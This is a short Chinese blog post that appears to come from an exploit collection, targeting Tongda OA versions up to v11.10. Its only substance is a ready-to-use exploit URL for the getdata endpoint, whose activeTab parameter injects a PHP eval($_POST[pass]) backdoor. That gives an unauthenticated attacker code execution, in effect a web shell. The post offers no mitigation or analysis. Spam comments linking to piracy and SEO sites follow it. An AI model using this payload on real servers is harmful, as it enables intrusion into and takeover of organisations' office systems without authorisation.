通达OA v11.9 getdata 未授权任意文件上传

漏洞描述

通达OA ≤ v11.10

EXP

/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[pass]))%3B/*&id=19&module=Carouselimage

最后修改：2023 年 10 月 31 日

如果觉得我的文章对你有用，请随意赞赏

nntztzlqbh
November 13th, 2024 at 07:29 am

《向天真的女生投降》爱情片高清在线免费观看：https://www.jgz518.com/xingkong/17006.html

回复
tkshxaceak
October 4th, 2024 at 09:32 pm

不错不错，我喜欢看 https://www.ea55.com/

回复
eeizbdsvxs
September 23rd, 2024 at 05:19 pm

叼茂SEO.bfbikes.com

回复
qmsnokemap
September 23rd, 2024 at 09:20 am

不错不错，我喜欢看 https://www.jiwenlaw.com/

回复

评论 *

私密评论

名称 *

🎲

邮箱 *

地址 *